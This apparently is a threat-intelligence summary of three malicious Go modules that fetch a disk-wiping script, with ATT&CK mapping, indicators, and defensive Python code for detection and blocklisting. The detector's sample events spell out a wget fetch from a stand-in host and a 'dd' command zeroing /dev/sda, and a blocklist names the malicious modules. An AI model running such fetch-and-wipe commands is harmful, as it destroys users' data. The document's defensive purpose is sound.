Full Report
Cybersecurity researchers have discovered three malicious Go modules that include obfuscated code to fetch next-stage payloads that can irrevocably overwrite a Linux system's primary disk and render it unbootable. The names of the packages are listed below:
- github[.]com/truthfulpharm/prototransform
- github[.]com/blankloggia/go-mcp
- github[.]com/steelpoor/tlsproxy
"Despite appearing legitimate,
Analysis Summary
# Tool/Technique: Malicious Go Modules (Disk-Wiping Payload Delivery)
## Overview
This entry summarizes a supply chain attack involving three malicious Go modules designed to fetch and execute a destructive payload on compromised Linux systems. The final payload irrevocably overwrites the system's primary disk, rendering it unbootable.
## Technical Details
- Type: Malware/Attack Chain (Delivery Mechanism via Dependency Confusion/Supply Chain)
- Platform: Linux
- Capabilities: delivery of an obfuscated initial payload, environment checks (OS detection), retrieval of a secondary destructive payload with `wget`, and execution of the disk-wiping script.
- First Seen: Leading up to May 03, 2025 (Date of article publication)
## MITRE ATT&CK Mapping
The primary focus is on the initial compromise via the software supply chain and the subsequent execution of destructive actions.
- **TA0001 - Initial Access**
  - T1195 - Supply Chain Compromise
    - T1195.002 - Compromise Software Supply Chain
- **TA0002 - Execution**
  - T1059 - Command and Scripting Interpreter
    - T1059.004 - Unix Shell
- **TA0004 - Privilege Escalation** (implied: writing to the raw disk requires elevated privileges)
- **TA0009 - Collection** (not explicitly detailed, but environment checking occurs)
- **TA0010 - Exfiltration** (not detailed; the focus is destruction)
- **TA0012 - Impact**
  - T1485 - Data Destruction
## Functionality
### Core Capabilities
- **Package Distribution:** Distributed via Go module repositories under seemingly benign names.
- **Obfuscation:** Initial code within the modules is highly obfuscated to hide malicious intent.
- **OS Check:** Modules specifically check if the running environment is Linux.
- **Payload Retrieval:** Utilizes `wget` to fetch a secondary, destructive payload from a remote server.
### Advanced Features
- **Irreversible Disk Overwrite:** The secondary payload is a shell script designed to overwrite the entire primary disk (`/dev/sda`) with zeroes. This action specifically aims to defeat data recovery and forensic inspection by permanently sanitizing the storage medium.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [Not provided in the context]
- Registry Keys: [Not applicable for Linux primary focus]
- Network Indicators: Connection established to a remote server for payload download via `wget`. Specific C2 details are not provided, only the method (`wget`).
- Behavioral Indicators:
  - Execution of Go binaries incorporating obfuscated code.
  - Use of `wget` immediately following execution, pointed at a remote source.
  - Execution of shell scripts that attempt to write directly to block devices (e.g., `/dev/sda`).
## Associated Threat Actors
- The specific threat actor group is **not named** in the article snippet, but the activity is attributed to actors conducting advanced supply chain attacks.
## Detection Methods
- **Signature-based detection:** Detecting known malicious Go module checksums or the specific package names during dependency resolution.
- **Behavioral detection:** Monitoring for downloaded binaries that immediately execute shell scripts targeting physical devices like `/dev/sda`. Monitoring for the execution chain Go module → `wget` → shell script execution.
- **YARA rules if available:** [Not provided in the context]
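As an added example, not code from the article, the execution chain above checked over constructed process-exec events: a process that touches a raw block device is flagged when a shell in its ancestry was spawned by a parent that had already run `wget`. The event layout, the binary name `prototransform` and the `example.invalid` URL are assumptions.

```python
import re
from collections import defaultdict

# Constructed process-exec events (ts, pid, ppid, comm, cmdline) standing in for
# auditd/eBPF telemetry; the binary name "prototransform" and the URL are assumptions.
SAMPLE_EVENTS = [
    {"ts": 1, "pid": 100, "ppid": 1,   "comm": "systemd",        "cmdline": "/sbin/init"},
    {"ts": 2, "pid": 200, "ppid": 100, "comm": "prototransform", "cmdline": "/usr/local/bin/prototransform"},
    {"ts": 3, "pid": 201, "ppid": 200, "comm": "wget",           "cmdline": "wget -q -O /tmp/p.sh http://example.invalid/p"},
    {"ts": 4, "pid": 202, "ppid": 200, "comm": "sh",             "cmdline": "/bin/sh /tmp/p.sh"},
    {"ts": 5, "pid": 203, "ppid": 202, "comm": "dd",             "cmdline": "dd if=/dev/zero of=/dev/sda bs=1M"},
    # Benign: an interactive shell fetching a tarball, no raw device write.
    {"ts": 6, "pid": 300, "ppid": 100, "comm": "bash",           "cmdline": "/bin/bash"},
    {"ts": 7, "pid": 301, "ppid": 300, "comm": "wget",           "cmdline": "wget https://example.invalid/f.tgz"},
]

# Raw block devices (whole disk or partition) named on a command line.
BLOCK_DEV = re.compile(r"/dev/(?:sd[a-z]|vd[a-z]|nvme\d+n\d+)\d*\b")
SHELLS = {"sh", "bash", "dash"}

def find_wipe_chains(events):
    """Return one alert per process that touches a raw block device and descends
    from a shell whose parent had already executed wget (fetch -> run -> wipe)."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    alerts = []
    for writer in events:
        if not BLOCK_DEV.search(writer["cmdline"]):
            continue
        cur = writer
        # Climb the ancestry; stop at the first shell whose parent ran wget earlier.
        while cur["ppid"] in by_pid:
            parent = by_pid[cur["ppid"]]
            fetchers = [c for c in children[parent["pid"]]
                        if c["comm"] == "wget" and c["ts"] < cur["ts"]]
            if cur["comm"] in SHELLS and fetchers:
                alerts.append({"root_pid": parent["pid"], "root": parent["comm"],
                               "wget_pid": fetchers[0]["pid"], "writer_pid": writer["pid"],
                               "device": BLOCK_DEV.search(writer["cmdline"]).group(0)})
                break
            cur = parent
    return alerts

if __name__ == "__main__":
    for a in find_wipe_chains(SAMPLE_EVENTS):
        print(f"ALERT root={a['root']}({a['root_pid']}) wget={a['wget_pid']} writer={a['writer_pid']} device={a['device']}")
```

The benign `bash` → `wget` pair produces no alert because nothing below it names a block device; requiring all three links keeps routine downloads out of the signal.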
## Mitigation Strategies
- **Prevention measures:** Strict vetting and auditing of third-party dependencies, especially in supply chain environments (e.g., using software composition analysis tools). Prefer locking dependencies to specific versions rather than allowing broad updates.
- **Hardening recommendations:** Implementing strict control over which network endpoints applications can connect to (network segmentation/allow-listing). Ensuring appropriate filesystem permissions to prevent writing directly to raw devices unless necessary and explicitly authorized by system administration processes.
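As an added example that is not part of the article, a pre-build check covering both the signature-based detection above (matching the named module paths during dependency resolution) and the dependency-vetting recommendation: it parses `go.mod` for the three module paths the report names, refanged from their published `github[.]com/...` form. The sample `go.mod`, its module name, `example.invalid/lib` and the versions are constructed.

```python
import re

# Module paths exactly as the article publishes them (defanged with "[.]");
# they are refanged before matching against go.mod entries.
KNOWN_MALICIOUS_DEFANGED = [
    "github[.]com/truthfulpharm/prototransform",
    "github[.]com/blankloggia/go-mcp",
    "github[.]com/steelpoor/tlsproxy",
]
# Constructed go.mod: the app module, example.invalid/lib and the versions are made up.
SAMPLE_GO_MOD = """module example.invalid/app
go 1.22
require github.com/blankloggia/go-mcp v0.1.0
require (
    example.invalid/lib v1.0.0
    github.com/steelpoor/tlsproxy v0.2.1 // indirect
)
"""
# A require entry: module path, whitespace, then a semantic version.
REQUIRE_LINE = re.compile(r"^([\w./~-]+)\s+(v[\w.+-]+)")

def refang(path):
    return path.replace("[.]", ".")

def go_mod_requires(text):
    """Yield (module_path, version) from go.mod: single-line `require m vX` and `require ( ... )` blocks; comments dropped."""
    in_block = False
    for raw in text.splitlines():
        line = raw.split("//", 1)[0].strip()
        if not line:
            continue
        if line.startswith("require ("):
            in_block = True
            continue
        if in_block and line == ")":
            in_block = False
            continue
        if line.startswith("require "):
            line = line[len("require "):].strip()
        elif not in_block:
            continue  # module, go, replace, exclude ... directives
        m = REQUIRE_LINE.match(line)
        if m:
            yield m.group(1), m.group(2)

def find_blocked(go_mod_text, blocklist=KNOWN_MALICIOUS_DEFANGED):
    """Return the (path, version) pairs in go.mod whose path is on the blocklist."""
    blocked = {refang(p) for p in blocklist}
    return [(p, v) for p, v in go_mod_requires(go_mod_text) if p in blocked]
```

Run it against the real `go.mod` in CI and fail the build on a non-empty result; `// indirect` entries are included deliberately, since a transitive pull of one of these modules is just as dangerous.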
## Related Tools/Techniques
The article mentions other contemporaneous supply chain campaigns:
- **Malicious npm packages:** Packages like `crypto-encrypt-ts`, `react-native-scrollpageviewtest`, and numerous packages appended with `-paypal` that steal crypto wallet data.
- **Malicious PyPI packages:** `web3x` and `herewalletbot` (crypto credential theft).
- **PyPI packages using Gmail:** Seven packages leveraging Gmail SMTP and WebSockets for C2 and data exfiltration (e.g., `cfc-bsb`, `coffin2022`).
The malicious Go modules identified in the article are:
- `github[.]com/truthfulpharm/prototransform`
- `github[.]com/blankloggia/go-mcp`
- `github[.]com/steelpoor/tlsproxy`